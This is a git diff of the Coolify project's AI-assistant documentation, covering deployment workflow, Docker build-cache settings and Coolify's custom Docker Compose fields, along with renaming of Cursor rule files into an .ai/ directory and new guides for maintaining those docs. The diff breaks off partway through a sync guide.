**[StandaloneDocker.php](mdc:app/Models/StandaloneDocker.php)** - Single container deployments +- **[SwarmDocker.php](mdc:app/Models/SwarmDocker.php)** - Docker Swarm orchestration + +## Deployment Workflow + +### 1. Source Code Integration +``` +Git Repository → Webhook → Coolify → Build & Deploy +``` + +#### Source Control Models +- **[GithubApp.php](mdc:app/Models/GithubApp.php)** - GitHub integration and webhooks +- **[GitlabApp.php](mdc:app/Models/GitlabApp.php)** - GitLab CI/CD integration + +#### Deployment Triggers +- **Git push** to configured branches +- **Manual deployment** via UI +- **Scheduled deployments** via cron +- **API-triggered** deployments + +### 2. Build Process +``` +Source Code → Docker Build → Image Registry → Deployment +``` + +#### Build Configurations +- **Dockerfile detection** and custom Dockerfile support +- **Buildpack integration** for framework detection +- **Multi-stage builds** for optimization +- **Cache layer** management for faster builds + +### 3. Deployment Orchestration +``` +Queue Job → Configuration Generation → Container Deployment → Health Checks +``` + +## Deployment Actions + +### Location: [app/Actions/](mdc:app/Actions) + +#### Application Deployment Actions +- **Application/** - Core application deployment logic +- **Docker/** - Docker container management +- **Service/** - Multi-container service orchestration +- **Proxy/** - Reverse proxy configuration + +#### Database Actions +- **Database/** - Database deployment and management +- Automated backup scheduling +- Connection management and health checks + +#### Server Management Actions +- **Server/** - Server provisioning and configuration +- SSH connection establishment +- Docker daemon management + +## Configuration Generation + +### Dynamic Configuration +- **[ConfigurationGenerator.php](mdc:app/Services/ConfigurationGenerator.php)** - Generates deployment configurations +- **[ConfigurationRepository.php](mdc:app/Services/ConfigurationRepository.php)** - Configuration management + +### Generated Configurations +#### Docker Compose Files +```yaml +# Generated docker-compose.yml structure +version: '3.8' +services: + app: + image: ${APP_IMAGE} + environment: + - ${ENV_VARIABLES} + labels: + - traefik.enable=true + - traefik.http.routers.app.rule=Host(`${FQDN}`) + volumes: + - ${VOLUME_MAPPINGS} + networks: + - coolify +``` + +#### Nginx Configurations +- **Reverse proxy** setup +- **SSL termination** with automatic certificates +- **Load balancing** for multiple instances +- **Custom headers** and routing rules + +## Container Orchestration + +### Docker Integration +- **[DockerImageParser.php](mdc:app/Services/DockerImageParser.php)** - Parse and validate Docker images +- **Container lifecycle** management +- **Resource allocation** and limits +- **Network isolation** and communication + +### Volume Management +- **[LocalFileVolume.php](mdc:app/Models/LocalFileVolume.php)** - Persistent file storage +- **[LocalPersistentVolume.php](mdc:app/Models/LocalPersistentVolume.php)** - Data persistence +- **Backup integration** for volume data + +### Network Configuration +- **Custom Docker networks** for isolation +- **Service discovery** between containers +- **Port mapping** and exposure +- **SSL/TLS termination** + +## Environment Management + +### Environment Isolation +- **[Environment.php](mdc:app/Models/Environment.php)** - Development, staging, production environments +- **[EnvironmentVariable.php](mdc:app/Models/EnvironmentVariable.php)** - Application-specific variables +- **[SharedEnvironmentVariable.php](mdc:app/Models/SharedEnvironmentVariable.php)** - Cross-application variables + +### Configuration Hierarchy +``` +Instance Settings → Server Settings → Project Settings → Application Settings +``` + +## Preview Environments + +### Git-Based Previews +- **[ApplicationPreview.php](mdc:app/Models/ApplicationPreview.php)** - Preview environment management +- **Automatic PR/MR previews** for feature branches +- **Isolated environments** for testing +- **Automatic cleanup** after merge/close + +### Preview Workflow +``` +Feature Branch → Auto-Deploy → Preview URL → Review → Cleanup +``` + +## SSL & Security + +### Certificate Management +- **[SslCertificate.php](mdc:app/Models/SslCertificate.php)** - SSL certificate automation +- **Let's Encrypt** integration for free certificates +- **Custom certificate** upload support +- **Automatic renewal** and monitoring + +### Security Patterns +- **Private Docker networks** for container isolation +- **SSH key-based** server authentication +- **Environment variable** encryption +- **Access control** via team permissions + +## Backup & Recovery + +### Database Backups +- **[ScheduledDatabaseBackup.php](mdc:app/Models/ScheduledDatabaseBackup.php)** - Automated database backups +- **[ScheduledDatabaseBackupExecution.php](mdc:app/Models/ScheduledDatabaseBackupExecution.php)** - Backup execution tracking +- **S3-compatible storage** for backup destinations + +### Application Backups +- **Volume snapshots** for persistent data +- **Configuration export** for disaster recovery +- **Cross-region replication** for high availability + +## Monitoring & Logging + +### Real-Time Monitoring +- **[ActivityMonitor.php](mdc:app/Livewire/ActivityMonitor.php)** - Live deployment monitoring +- **WebSocket-based** log streaming +- **Container health checks** and alerts +- **Resource usage** tracking + +### Deployment Logs +- **Build process** logging +- **Container startup** logs +- **Application runtime** logs +- **Error tracking** and alerting + +## Queue System + +### Background Jobs +Location: [app/Jobs/](mdc:app/Jobs) +- **Deployment jobs** for async processing +- **Server monitoring** jobs +- **Backup scheduling** jobs +- **Notification delivery** jobs + +### Queue Processing +- **Redis-backed** job queues +- **Laravel Horizon** for queue monitoring +- **Failed job** retry mechanisms +- **Queue worker** auto-scaling + +## Multi-Server Deployment + +### Server Types +- **Standalone servers** - Single Docker host +- **Docker Swarm** - Multi-node orchestration +- **Remote servers** - SSH-based deployment +- **Local development** - Docker Desktop integration + +### Load Balancing +- **Traefik integration** for automatic load balancing +- **Health check** based routing +- **Blue-green deployments** for zero downtime +- **Rolling updates** with configurable strategies + +## Deployment Strategies + +### Zero-Downtime Deployment +``` +Old Container → New Container Build → Health Check → Traffic Switch → Old Container Cleanup +``` + +### Blue-Green Deployment +- **Parallel environments** for safe deployments +- **Instant rollback** capability +- **Database migration** handling +- **Configuration synchronization** + +### Rolling Updates +- **Gradual instance** replacement +- **Configurable update** strategy +- **Automatic rollback** on failure +- **Health check** validation + +## API Integration + +### Deployment API +Routes: [routes/api.php](mdc:routes/api.php) +- **RESTful endpoints** for deployment management +- **Webhook receivers** for CI/CD integration +- **Status reporting** endpoints +- **Deployment triggering** via API + +### Authentication +- **Laravel Sanctum** API tokens +- **Team-based** access control +- **Rate limiting** for API calls +- **Audit logging** for API usage + +## Error Handling & Recovery + +### Deployment Failure Recovery +- **Automatic rollback** on deployment failure +- **Health check** failure handling +- **Container crash** recovery +- **Resource exhaustion** protection + +### Monitoring & Alerting +- **Failed deployment** notifications +- **Resource threshold** alerts +- **SSL certificate** expiry warnings +- **Backup failure** notifications + +## Performance Optimization + +### Build Optimization +- **Docker layer** caching +- **Multi-stage builds** for smaller images +- **Build artifact** reuse +- **Parallel build** processing + +### Docker Build Cache Preservation + +Coolify provides settings to preserve Docker build cache across deployments, addressing cache invalidation issues. + +#### The Problem + +By default, Coolify injects `ARG` statements into user Dockerfiles for build-time variables. This breaks Docker's cache mechanism because: +1. **ARG declarations invalidate cache** - Any change in ARG values after the `ARG` instruction invalidates all subsequent layers +2. **SOURCE_COMMIT changes every commit** - Causes full rebuilds even when code changes are minimal + +#### Application Settings + +Two toggles in **Advanced Settings** control this behavior: + +| Setting | Default | Description | +|---------|---------|-------------| +| `inject_build_args_to_dockerfile` | `true` | Controls whether Coolify adds `ARG` statements to Dockerfile | +| `include_source_commit_in_build` | `false` | Controls whether `SOURCE_COMMIT` is included in build context | + +**Database columns:** `application_settings.inject_build_args_to_dockerfile`, `application_settings.include_source_commit_in_build` + +#### Buildpack Coverage + +| Build Pack | ARG Injection | Method | +|------------|---------------|--------| +| **Dockerfile** | ✅ Yes | `add_build_env_variables_to_dockerfile()` | +| **Docker Compose** (with `build:`) | ✅ Yes | `modify_dockerfiles_for_compose()` | +| **PR Deployments** (Dockerfile only) | ✅ Yes | `add_build_env_variables_to_dockerfile()` | +| **Nixpacks** | ❌ No | Generates its own Dockerfile internally | +| **Static** | ❌ No | Uses internal Dockerfile | +| **Docker Image** | ❌ No | No build phase | + +#### How It Works + +**When `inject_build_args_to_dockerfile` is enabled (default):** +```dockerfile +# Coolify modifies your Dockerfile to add: +FROM node:20 +ARG MY_VAR=value +ARG COOLIFY_URL=... +ARG SOURCE_COMMIT=abc123 # (if include_source_commit_in_build is true) +# ... rest of your Dockerfile +``` + +**When `inject_build_args_to_dockerfile` is disabled:** +- Coolify does NOT modify the Dockerfile +- `--build-arg` flags are still passed (harmless without matching `ARG` in Dockerfile) +- User must manually add `ARG` statements for any build-time variables they need + +**When `include_source_commit_in_build` is disabled (default):** +- `SOURCE_COMMIT` is NOT included in build-time variables +- `SOURCE_COMMIT` is still available at **runtime** (in container environment) +- Docker cache preserved across different commits + +#### Recommended Configuration + +| Use Case | inject_build_args | include_source_commit | Cache Behavior | +|----------|-------------------|----------------------|----------------| +| Maximum cache preservation | `false` | `false` | Best cache retention | +| Need build-time vars, no commit | `true` | `false` | Cache breaks on var changes | +| Need commit at build-time | `true` | `true` | Cache breaks every commit | +| Manual ARG management | `false` | `true` | Cache preserved (no ARG in Dockerfile) | + +#### Implementation Details + +**Files:** +- `app/Jobs/ApplicationDeploymentJob.php`: + - `set_coolify_variables()` - Conditionally adds SOURCE_COMMIT to Docker build context based on `include_source_commit_in_build` setting + - `generate_coolify_env_variables(bool $forBuildTime)` - Distinguishes build-time vs. runtime variables; excludes cache-busting variables like SOURCE_COMMIT from build context unless explicitly enabled + - `generate_env_variables()` - Populates `$this->env_args` with build-time ARG values, respecting `include_source_commit_in_build` toggle + - `add_build_env_variables_to_dockerfile()` - Injects ARG statements into Dockerfiles after FROM instructions; skips injection if `inject_build_args_to_dockerfile` is disabled + - `modify_dockerfiles_for_compose()` - Applies ARG injection to Docker Compose service Dockerfiles; respects `inject_build_args_to_dockerfile` toggle +- `app/Models/ApplicationSetting.php` - Defines `inject_build_args_to_dockerfile` and `include_source_commit_in_build` boolean properties +- `app/Livewire/Project/Application/Advanced.php` - Livewire component providing UI bindings for cache preservation toggles +- `resources/views/livewire/project/application/advanced.blade.php` - Checkbox UI elements for user-facing toggles + +**Note:** Docker Compose services without a `build:` section (image-only) are automatically skipped. + +### Runtime Optimization +- **Container resource** limits +- **Auto-scaling** based on metrics +- **Connection pooling** for databases +- **CDN integration** for static assets + +## Compliance & Governance + +### Audit Trail +- **Deployment history** tracking +- **Configuration changes** logging +- **User action** auditing +- **Resource access** monitoring + +### Backup Compliance +- **Retention policies** for backups +- **Encryption at rest** for sensitive data +- **Cross-region** backup replication +- **Recovery testing** automation + +## Integration Patterns + +### CI/CD Integration +- **GitHub Actions** compatibility +- **GitLab CI** pipeline integration +- **Custom webhook** endpoints +- **Build status** reporting + +### External Services +- **S3-compatible** storage integration +- **External database** connections +- **Third-party monitoring** tools +- **Custom notification** channels + +--- + +## Coolify Docker Compose Extensions + +Coolify extends standard Docker Compose with custom fields (often called "magic fields") that provide Coolify-specific functionality. These extensions are processed during deployment and stripped before sending the final compose file to Docker, maintaining full compatibility with Docker's compose specification. + +### Overview + +**Why Custom Fields?** +- Enable Coolify-specific features without breaking Docker Compose compatibility +- Simplify configuration by embedding content directly in compose files +- Allow fine-grained control over health check monitoring +- Reduce external file dependencies + +**Processing Flow:** +1. User defines compose file with custom fields +2. Coolify parses and processes custom fields (creates files, stores settings) +3. Custom fields are stripped from final compose sent to Docker +4. Docker receives standard, valid compose file + +### Service-Level Extensions + +#### `exclude_from_hc` + +**Type:** Boolean +**Default:** `false` +**Purpose:** Exclude specific services from health check monitoring while still showing their status + +**Example Usage:** +```yaml +services: + watchtower: + image: containrrr/watchtower + exclude_from_hc: true # Don't monitor this service's health + + backup: + image: postgres:16 + exclude_from_hc: true # Backup containers don't need monitoring + restart: always +``` + +**Behavior:** +- Container status is still calculated from Docker state (running, exited, etc.) +- Status displays with `:excluded` suffix (e.g., `running:healthy:excluded`) +- UI shows "Monitoring Disabled" indicator +- Functionally equivalent to `restart: no` for health check purposes +- See [Container Status with All Excluded](application-architecture.md#container-status-when-all-containers-excluded) for detailed status handling + +**Use Cases:** +- Sidecar containers (watchtower, log collectors) +- Backup/maintenance containers +- One-time initialization containers +- Containers that intentionally restart frequently + +**Implementation:** +- Parsed: `bootstrap/helpers/parsers.php` +- Status logic: `app/Traits/CalculatesExcludedStatus.php` +- Validation: `tests/Unit/ExcludeFromHealthCheckTest.php` + +### Volume-Level Extensions + +Volume extensions only work with **long syntax** (array/object format), not short syntax (string format). + +#### `content` + +**Type:** String (supports multiline with `|` or `>`) +**Purpose:** Embed file content directly in compose file for automatic creation during deployment + +**Example Usage:** +```yaml +services: + app: + image: node:20 + volumes: + # Inline entrypoint script + - type: bind + source: ./entrypoint.sh + target: /app/entrypoint.sh + content: | + #!/bin/sh + set -e + echo "Starting application..." + npm run migrate + exec "$@" + + # Configuration file with environment variables + - type: bind + source: ./config.xml + target: /etc/app/config.xml + content: | + + + + ${DB_HOST} + ${DB_PORT} + + +``` + +**Behavior:** +- Content is written to the host at `source` path before container starts +- File is created with mode `644` (readable by all, writable by owner) +- Environment variables in content are interpolated at deployment time +- Content is stored in `LocalFileVolume` model (encrypted at rest) +- Original `docker_compose_raw` retains content for editing + +**Use Cases:** +- Entrypoint scripts +- Configuration files +- Environment-specific settings +- Small initialization scripts +- Templates that require dynamic content + +**Limitations:** +- Not suitable for large files (use git repo or external storage instead) +- Binary files not supported +- Changes require redeployment + +**Real-World Examples:** +- `templates/compose/traccar.yaml` - XML configuration file +- `templates/compose/supabase.yaml` - Multiple config files +- `templates/compose/chaskiq.yaml` - Entrypoint script + +**Implementation:** +- Parsed: `bootstrap/helpers/parsers.php` in `parseCompose()` function (handles `content` field extraction) +- Storage: `app/Models/LocalFileVolume.php` +- Validation: `tests/Unit/StripCoolifyCustomFieldsTest.php` + +#### `is_directory` / `isDirectory` + +**Type:** Boolean +**Default:** `true` (if neither `content` nor explicit flag provided) +**Purpose:** Indicate whether bind mount source should be created as directory or file + +**Example Usage:** +```yaml +services: + app: + volumes: + # Explicit file + - type: bind + source: ./config.json + target: /app/config.json + is_directory: false # Create as file + + # Explicit directory + - type: bind + source: ./logs + target: /var/log/app + is_directory: true # Create as directory + + # Auto-detected as file (has content) + - type: bind + source: ./script.sh + target: /entrypoint.sh + content: | + #!/bin/sh + echo "Hello" + # is_directory: false implied by content presence +``` + +**Behavior:** +- If `is_directory: true` → Creates directory with `mkdir -p` +- If `is_directory: false` → Creates empty file with `touch` +- If `content` provided → Implies `is_directory: false` +- If neither specified → Defaults to `true` (directory) + +**Naming Conventions:** +- `is_directory` (snake_case) - **Preferred**, consistent with PHP/Laravel conventions +- `isDirectory` (camelCase) - **Legacy support**, both work identically + +**Use Cases:** +- Disambiguating files vs directories when no content provided +- Ensuring correct bind mount type for Docker +- Pre-creating mount points before container starts + +**Implementation:** +- Parsed: `bootstrap/helpers/parsers.php` in `parseCompose()` function (handles `is_directory`/`isDirectory` field extraction) +- Storage: `app/Models/LocalFileVolume.php` (`is_directory` column) +- Validation: `tests/Unit/StripCoolifyCustomFieldsTest.php` + +### Custom Field Stripping + +**Function:** `stripCoolifyCustomFields()` in `bootstrap/helpers/docker.php` + +All custom fields are removed before the compose file is sent to Docker. This happens in two contexts: + +**1. Validation (User-Triggered)** +```php +// In validateComposeFile() - Edit Docker Compose modal +$yaml_compose = Yaml::parse($compose); +$yaml_compose = stripCoolifyCustomFields($yaml_compose); // Strip custom fields +// Send to docker compose config for validation +``` + +**2. Deployment (Automatic)** +```php +// In Service::parse() - During deployment +$docker_compose = parseCompose($docker_compose_raw); +// Custom fields are processed and then stripped +// Final compose sent to Docker has no custom fields +``` + +**What Gets Stripped:** +- Service-level: `exclude_from_hc` +- Volume-level: `content`, `isDirectory`, `is_directory` + +**What's Preserved:** +- All standard Docker Compose fields +- Environment variables +- Standard volume definitions (after custom fields removed) + +### Important Notes + +#### Long vs Short Volume Syntax + +**✅ Long Syntax (Works with Custom Fields):** +```yaml +volumes: + - type: bind + source: ./data + target: /app/data + content: "Hello" # ✅ Custom fields work here +``` + +**❌ Short Syntax (Custom Fields Ignored):** +```yaml +volumes: + - "./data:/app/data" # ❌ Cannot add custom fields to strings +``` + +#### Docker Compose Compatibility + +Custom fields are **Coolify-specific** and won't work with standalone `docker compose` CLI: + +```bash +# ❌ Won't work - Docker doesn't recognize custom fields +docker compose -f compose.yaml up + +# ✅ Works - Use Coolify's deployment (strips custom fields first) +# Deploy through Coolify UI or API +``` + +#### Editing Custom Fields + +When editing in "Edit Docker Compose" modal: +- Custom fields are preserved in the editor +- "Validate" button strips them temporarily for Docker validation +- "Save" button preserves them in `docker_compose_raw` +- They're processed again on next deployment + +### Template Examples + +See these templates for real-world usage: + +**Service Exclusions:** +- `templates/compose/budibase.yaml` - Excludes watchtower from monitoring +- `templates/compose/pgbackweb.yaml` - Excludes backup service +- `templates/compose/elasticsearch-with-kibana.yaml` - Excludes elasticsearch + +**Inline Content:** +- `templates/compose/traccar.yaml` - XML configuration (multiline) +- `templates/compose/supabase.yaml` - Multiple config files +- `templates/compose/searxng.yaml` - Settings file +- `templates/compose/invoice-ninja.yaml` - Nginx config + +**Directory Flags:** +- `templates/compose/paperless.yaml` - Explicit directory creation + +### Testing + +**Unit Tests:** +- `tests/Unit/StripCoolifyCustomFieldsTest.php` - Custom field stripping logic +- `tests/Unit/ExcludeFromHealthCheckTest.php` - Health check exclusion behavior +- `tests/Unit/ContainerStatusAggregatorTest.php` - Status aggregation with exclusions + +**Test Coverage:** +- ✅ All custom fields (exclude_from_hc, content, isDirectory, is_directory) +- ✅ Multiline content (YAML `|` syntax) +- ✅ Short vs long volume syntax +- ✅ Field stripping without data loss +- ✅ Standard Docker Compose field preservation diff --git a/.cursor/rules/project-overview.mdc b/.ai/core/project-overview.md similarity index 96% rename from .cursor/rules/project-overview.mdc rename to .ai/core/project-overview.md index b615a5d3e..59fda4868 100644 --- a/.cursor/rules/project-overview.mdc +++ b/.ai/core/project-overview.md @@ -1,8 +1,3 @@ ---- -description: High-level project mission, core concepts, and architectural overview -globs: README.md, CONTRIBUTING.md, CHANGELOG.md, *.md -alwaysApply: false ---- # Coolify Project Overview ## What is Coolify? diff --git a/.cursor/rules/technology-stack.mdc b/.ai/core/technology-stack.md similarity index 67% rename from .cursor/rules/technology-stack.mdc rename to .ai/core/technology-stack.md index 2119a2ff1..b12534db7 100644 --- a/.cursor/rules/technology-stack.mdc +++ b/.ai/core/technology-stack.md @@ -1,23 +1,19 @@ ---- -description: Complete technology stack, dependencies, and infrastructure components -globs: composer.json, package.json, docker-compose*.yml, config/*.php -alwaysApply: false ---- # Coolify Technology Stack +Complete technology stack, dependencies, and infrastructure components. + ## Backend Framework ### **Laravel 12.4.1** (PHP Framework) -- **Location**: [composer.json](mdc:composer.json) - **Purpose**: Core application framework -- **Key Features**: +- **Key Features**: - Eloquent ORM for database interactions - Artisan CLI for development tasks - Queue system for background jobs - Event-driven architecture -### **PHP 8.4** -- **Requirement**: `^8.4` in [composer.json](mdc:composer.json) +### **PHP 8.4.7** +- **Requirement**: `^8.4` in composer.json - **Features Used**: - Typed properties and return types - Attributes for validation and configuration @@ -28,11 +24,11 @@ ## Frontend Stack ### **Livewire 3.5.20** (Primary Frontend Framework) - **Purpose**: Server-side rendering with reactive components -- **Location**: [app/Livewire/](mdc:app/Livewire/) +- **Location**: `app/Livewire/` - **Key Components**: - - [Dashboard.php](mdc:app/Livewire/Dashboard.php) - Main interface - - [ActivityMonitor.php](mdc:app/Livewire/ActivityMonitor.php) - Real-time monitoring - - [MonacoEditor.php](mdc:app/Livewire/MonacoEditor.php) - Code editor + - Dashboard - Main interface + - ActivityMonitor - Real-time monitoring + - MonacoEditor - Code editor ### **Alpine.js** (Client-Side Interactivity) - **Purpose**: Lightweight JavaScript for DOM manipulation @@ -40,8 +36,7 @@ ### **Alpine.js** (Client-Side Interactivity) - **Usage**: Declarative directives in Blade templates ### **Tailwind CSS 4.1.4** (Styling Framework) -- **Location**: [package.json](mdc:package.json) -- **Configuration**: [postcss.config.cjs](mdc:postcss.config.cjs) +- **Configuration**: `postcss.config.cjs` - **Extensions**: - `@tailwindcss/forms` - Form styling - `@tailwindcss/typography` - Content typography @@ -57,24 +52,24 @@ ## Database & Caching ### **PostgreSQL 15** (Primary Database) - **Purpose**: Main application data storage - **Features**: JSONB support, advanced indexing -- **Models**: [app/Models/](mdc:app/Models/) +- **Models**: `app/Models/` ### **Redis 7** (Caching & Real-time) -- **Purpose**: +- **Purpose**: - Session storage - Queue backend - Real-time data caching - WebSocket session management ### **Supported Databases** (For User Applications) -- **PostgreSQL**: [StandalonePostgresql.php](mdc:app/Models/StandalonePostgresql.php) -- **MySQL**: [StandaloneMysql.php](mdc:app/Models/StandaloneMysql.php) -- **MariaDB**: [StandaloneMariadb.php](mdc:app/Models/StandaloneMariadb.php) -- **MongoDB**: [StandaloneMongodb.php](mdc:app/Models/StandaloneMongodb.php) -- **Redis**: [StandaloneRedis.php](mdc:app/Models/StandaloneRedis.php) -- **KeyDB**: [StandaloneKeydb.php](mdc:app/Models/StandaloneKeydb.php) -- **Dragonfly**: [StandaloneDragonfly.php](mdc:app/Models/StandaloneDragonfly.php) -- **ClickHouse**: [StandaloneClickhouse.php](mdc:app/Models/StandaloneClickhouse.php) +- **PostgreSQL**: StandalonePostgresql +- **MySQL**: StandaloneMysql +- **MariaDB**: StandaloneMariadb +- **MongoDB**: StandaloneMongodb +- **Redis**: StandaloneRedis +- **KeyDB**: StandaloneKeydb +- **Dragonfly**: StandaloneDragonfly +- **ClickHouse**: StandaloneClickhouse ## Authentication & Security @@ -101,7 +96,7 @@ ### **Laravel Horizon 5.30.3** ### **Queue System** - **Backend**: Redis-based queues -- **Jobs**: [app/Jobs/](mdc:app/Jobs/) +- **Jobs**: `app/Jobs/` - **Processing**: Background deployment and monitoring tasks ## Development Tools @@ -130,21 +125,21 @@ ### **Git Providers** - **Gitea**: Self-hosted Git service ### **Cloud Storage** -- **AWS S3**: [league/flysystem-aws-s3-v3](mdc:composer.json) -- **SFTP**: [league/flysystem-sftp-v3](mdc:composer.json) +- **AWS S3**: league/flysystem-aws-s3-v3 +- **SFTP**: league/flysystem-sftp-v3 - **Local Storage**: File system integration ### **Notification Services** -- **Email**: [resend/resend-laravel](mdc:composer.json) +- **Email**: resend/resend-laravel - **Discord**: Custom webhook integration - **Slack**: Webhook notifications - **Telegram**: Bot API integration - **Pushover**: Push notifications ### **Monitoring & Logging** -- **Sentry**: [sentry/sentry-laravel](mdc:composer.json) - Error tracking -- **Laravel Ray**: [spatie/laravel-ray](mdc:composer.json) - Debug tool -- **Activity Log**: [spatie/laravel-activitylog](mdc:composer.json) +- **Sentry**: sentry/sentry-laravel - Error tracking +- **Laravel Ray**: spatie/laravel-ray - Debug tool +- **Activity Log**: spatie/laravel-activitylog ## DevOps & Infrastructure @@ -181,9 +176,9 @@ ### **Monaco Editor** ## API & Documentation ### **OpenAPI/Swagger** -- **Documentation**: [openapi.json](mdc:openapi.json) (373KB) -- **Generator**: [zircote/swagger-php](mdc:composer.json) -- **API Routes**: [routes/api.php](mdc:routes/api.php) +- **Documentation**: openapi.json (373KB) +- **Generator**: zircote/swagger-php +- **API Routes**: `routes/api.php` ### **WebSocket Communication** - **Laravel Echo**: Real-time event broadcasting @@ -192,7 +187,7 @@ ### **WebSocket Communication** ## Package Management -### **PHP Dependencies** ([composer.json](mdc:composer.json)) +### **PHP Dependencies** (composer.json) ```json { "require": { @@ -205,7 +200,7 @@ ### **PHP Dependencies** ([composer.json](mdc:composer.json)) } ``` -### **JavaScript Dependencies** ([package.json](mdc:package.json)) +### **JavaScript Dependencies** (package.json) ```json { "devDependencies": { @@ -223,15 +218,15 @@ ### **JavaScript Dependencies** ([package.json](mdc:package.json)) ## Configuration Files ### **Build Configuration** -- **[vite.config.js](mdc:vite.config.js)**: Frontend build setup -- **[postcss.config.cjs](mdc:postcss.config.cjs)**: CSS processing -- **[rector.php](mdc:rector.php)**: PHP refactoring rules -- **[pint.json](mdc:pint.json)**: Code style configuration +- **vite.config.js**: Frontend build setup +- **postcss.config.cjs**: CSS processing +- **rector.php**: PHP refactoring rules +- **pint.json**: Code style configuration ### **Testing Configuration** -- **[phpunit.xml](mdc:phpunit.xml)**: Unit test configuration -- **[phpunit.dusk.xml](mdc:phpunit.dusk.xml)**: Browser test configuration -- **[tests/Pest.php](mdc:tests/Pest.php)**: Pest testing setup +- **phpunit.xml**: Unit test configuration +- **phpunit.dusk.xml**: Browser test configuration +- **tests/Pest.php**: Pest testing setup ## Version Requirements diff --git a/.cursor/rules/development-workflow.mdc b/.ai/development/development-workflow.md similarity index 98% rename from .cursor/rules/development-workflow.mdc rename to .ai/development/development-workflow.md index 175b7d85a..4ee376696 100644 --- a/.cursor/rules/development-workflow.mdc +++ b/.ai/development/development-workflow.md @@ -1,8 +1,3 @@ ---- -description: Development setup, coding standards, contribution guidelines, and best practices -globs: **/*.php, composer.json, package.json, *.md, .env.example -alwaysApply: false ---- # Coolify Development Workflow ## Development Environment Setup diff --git a/.cursor/rules/laravel-boost.mdc b/.ai/development/laravel-boost.md similarity index 99% rename from .cursor/rules/laravel-boost.mdc rename to .ai/development/laravel-boost.md index c409a4647..7f5922d94 100644 --- a/.cursor/rules/laravel-boost.mdc +++ b/.ai/development/laravel-boost.md @@ -1,6 +1,3 @@ ---- -alwaysApply: true ---- === foundation rules === diff --git a/.cursor/rules/testing-patterns.mdc b/.ai/development/testing-patterns.md similarity index 99% rename from .cursor/rules/testing-patterns.mdc rename to .ai/development/testing-patterns.md index 8d250b56a..875de8b3b 100644 --- a/.cursor/rules/testing-patterns.mdc +++ b/.ai/development/testing-patterns.md @@ -1,8 +1,3 @@ ---- -description: Testing strategies with Pest PHP, Laravel Dusk, and quality assurance patterns -globs: tests/**/*.php, database/factories/*.php -alwaysApply: false ---- # Coolify Testing Architecture & Patterns > **Cross-Reference**: These detailed testing patterns align with the testing guidelines in **[CLAUDE.md](mdc:CLAUDE.md)**. Both documents share the same core principles about Docker execution and mocking preferences. diff --git a/.ai/meta/maintaining-docs.md b/.ai/meta/maintaining-docs.md new file mode 100644 index 000000000..1a1552399 --- /dev/null +++ b/.ai/meta/maintaining-docs.md @@ -0,0 +1,172 @@ +# Maintaining AI Documentation + +Guidelines for creating and maintaining AI documentation to ensure consistency and effectiveness across all AI tools (Claude Code, Cursor IDE, etc.). + +## Documentation Structure + +All AI documentation lives in the `.ai/` directory with the following structure: + +``` +.ai/ +├── README.md # Navigation hub +├── core/ # Core project information +├── development/ # Development practices +├── patterns/ # Code patterns and best practices +└── meta/ # Documentation maintenance guides +``` + +> **Note**: `CLAUDE.md` is in the repository root, not in the `.ai/` directory. + +## Required File Structure + +When creating new documentation files: + +```markdown +# Title + +Brief description of what this document covers. + +## Section 1 + +- **Main Points in Bold** + - Sub-points with details + - Examples and explanations + +## Section 2 + +### Subsection + +Content with code examples: + +```language +// ✅ DO: Show good examples +const goodExample = true; + +// ❌ DON'T: Show anti-patterns +const badExample = false; +``` +``` + +## File References + +- Use relative paths: `See [technology-stack.md](../core/technology-stack.md)` +- For code references: `` `app/Models/Application.php` `` +- Keep links working across different tools + +## Content Guidelines + +### DO: +- Start with high-level overview +- Include specific, actionable requirements +- Show examples of correct implementation +- Reference existing code when possible +- Keep documentation DRY by cross-referencing +- Use bullet points for clarity +- Include both DO and DON'T examples + +### DON'T: +- Create theoretical examples when real code exists +- Duplicate content across multiple files +- Use tool-specific formatting that won't work elsewhere +- Make assumptions about versions - specify exact versions + +## Rule Improvement Triggers + +Update documentation when you notice: +- New code patterns not covered by existing docs +- Repeated similar implementations across files +- Common error patterns that could be prevented +- New libraries or tools being used consistently +- Emerging best practices in the codebase + +## Analysis Process + +When updating documentation: +1. Compare new code with existing rules +2. Identify patterns that should be standardized +3. Look for references to external documentation +4. Check for consistent error handling patterns +5. Monitor test patterns and coverage + +## Rule Updates + +### Add New Documentation When: +- A new technology/pattern is used in 3+ files +- Common bugs could be prevented by documentation +- Code reviews repeatedly mention the same feedback +- New security or performance patterns emerge + +### Modify Existing Documentation When: +- Better examples exist in the codebase +- Additional edge cases are discovered +- Related documentation has been updated +- Implementation details have changed + +## Quality Checks + +Before committing documentation changes: +- [ ] Documentation is actionable and specific +- [ ] Examples come from actual code +- [ ] References are up to date +- [ ] Patterns are consistently enforced +- [ ] Cross-references work correctly +- [ ] Version numbers are exact and current + +## Continuous Improvement + +- Monitor code review comments +- Track common development questions +- Update docs after major refactors +- Add links to relevant documentation +- Cross-reference related docs + +## Deprecation + +When patterns become outdated: +1. Mark outdated patterns as deprecated +2. Remove docs that no longer apply +3. Update references to deprecated patterns +4. Document migration paths for old patterns + +## Synchronization + +### Single Source of Truth +- Each piece of information should exist in exactly ONE location +- Other files should reference the source, not duplicate it +- Example: Version numbers live in `core/technology-stack.md`, other files reference it + +### Cross-Tool Compatibility +- **CLAUDE.md**: Main instructions for Claude Code users (references `.ai/` files) +- **.cursor/rules/**: Single master file pointing to `.ai/` documentation +- **Both tools**: Should get same information from `.ai/` directory + +### When to Update What + +**Version Changes** (Laravel, PHP, packages): +1. Update `core/technology-stack.md` (single source) +2. Verify CLAUDE.md references it correctly +3. No other files should duplicate version numbers + +**Workflow Changes** (commands, setup): +1. Update `development/workflow.md` +2. Ensure CLAUDE.md quick reference is updated +3. Verify all cross-references work + +**Pattern Changes** (how to write code): +1. Update appropriate file in `patterns/` +2. Add/update examples from real codebase +3. Cross-reference from related docs + +## Documentation Files + +Keep documentation files only when explicitly needed. Don't create docs that merely describe obvious functionality - the code itself should be clear. + +## Breaking Changes + +When making breaking changes to documentation structure: +1. Update this maintaining-docs.md file +2. Update `.ai/README.md` navigation +3. Update CLAUDE.md references +4. Update `.cursor/rules/coolify-ai-docs.mdc` +5. Test all cross-references still work +6. Document the changes in sync-guide.md diff --git a/.ai/meta/sync-guide.md b/.ai/meta/sync-guide.md new file mode 100644 index 000000000..ab9a45d1a --- /dev/null +++ b/.ai/meta/sync-guide.md @@ -0,0 +1,214 @@ +# AI Instructions Synchronization Guide + +This document explains how AI instructions are organized and synchronized across different AI tools used with Coolify. + +## Overview + +Coolify maintains AI instructions with a **single source of truth** approach: + +1. **CLAUDE.md** - Main entry point for Claude Code (references `.ai/` directory) +2. 